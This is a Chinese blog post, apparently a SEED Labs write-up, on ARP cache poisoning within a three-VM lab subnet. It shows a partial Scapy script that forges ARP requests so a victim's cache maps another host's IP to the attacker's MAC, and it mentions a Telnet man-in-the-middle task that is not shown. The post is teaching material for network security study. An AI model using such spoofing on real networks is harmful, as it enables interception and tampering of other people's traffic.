【Seedlabs】ARP Cache Poisoning Attack Lab

本文详细介绍了如何进行ARP缓存中毒攻击,包括构造ARP请求、应答和免费包,以及如何利用ARP缓存中毒进行中间人攻击。通过在主机M上进行操作,成功使主机A和B的ARP缓存映射到M的MAC地址,实现了数据包的转发和篡改,展示了MITM攻击在Telnet连接中的影响。
摘要由CSDN通过智能技术生成

目录

一、实验环境

二、实验内容

Task 1: ARP Cache Poisoning

Task 2: MITM Attack on Telnet using ARP Cache Poisoning 

一、实验环境

本地共有三台虚拟机,位于同一个子网下。地址如下:
主机名 IP 地址 MAC 地址
M (攻击者) 10.9.0.105 02:42:0a:09:00:69
A (客户端) 10.9.0.5 02:42:0a:09:00:05
B (服务器) 10.9.0.6 02:42:0a:09:00:06

二、实验内容

Task 1: ARP Cache Poisoning

Task 1A (using ARP request).
 

     On host M, construct an ARP request packet and send to host A. Check whether M’s MAC address is mapped to B’s IP address in A’s ARP cache.

       在主机 M 上,构造一个 ARP 请求包,发送给主机 A。查看主机 A 的 ARP 缓存中 M 的 MAC 地址是否映射到 B 的 IP 地址。

#!/usr/bin/python3 
from scapy.all import * 
# M
src_mac='02:42:0a:09:00:69'# M
dst_mac='00:00:00:00:00:00' 
dst_mac_eth='ff:ff:ff:ff:ff:ff' 
src_ip='10.9.0.6' # B 
dst_ip='10.9.0.99' # 任意 IP 
eth = Ether(src=src_mac,dst=dst_mac_eth) 
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=1) 
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值